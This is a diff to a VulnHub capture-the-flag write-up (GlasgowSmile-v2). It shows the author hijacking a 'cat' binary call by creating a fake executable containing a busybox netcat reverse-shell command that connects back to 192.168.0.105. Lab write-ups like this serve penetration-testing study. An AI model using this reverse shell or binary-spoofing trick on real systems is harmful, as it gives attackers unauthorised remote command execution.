loid122/writeups/vulnhub/GlasgowSmile-v2/Readme.md

 \
 WE see that there is a line "cat ./batman"
 \
-So i create  binary with a reverse shell payload
+So i create a binary to spoof the actual "cat" binary with a reverse shell payload
 ```bash
 enom@glasgowsmile2:~/Ladies_and_Gentlmen/Gotham$ echo "busybox nc 192.168.0.105 4446 -e /bin/sh" > cat
 venom@glasgowsmile2:~/Ladies_and_Gentlmen/Gotham$ chmod +x cat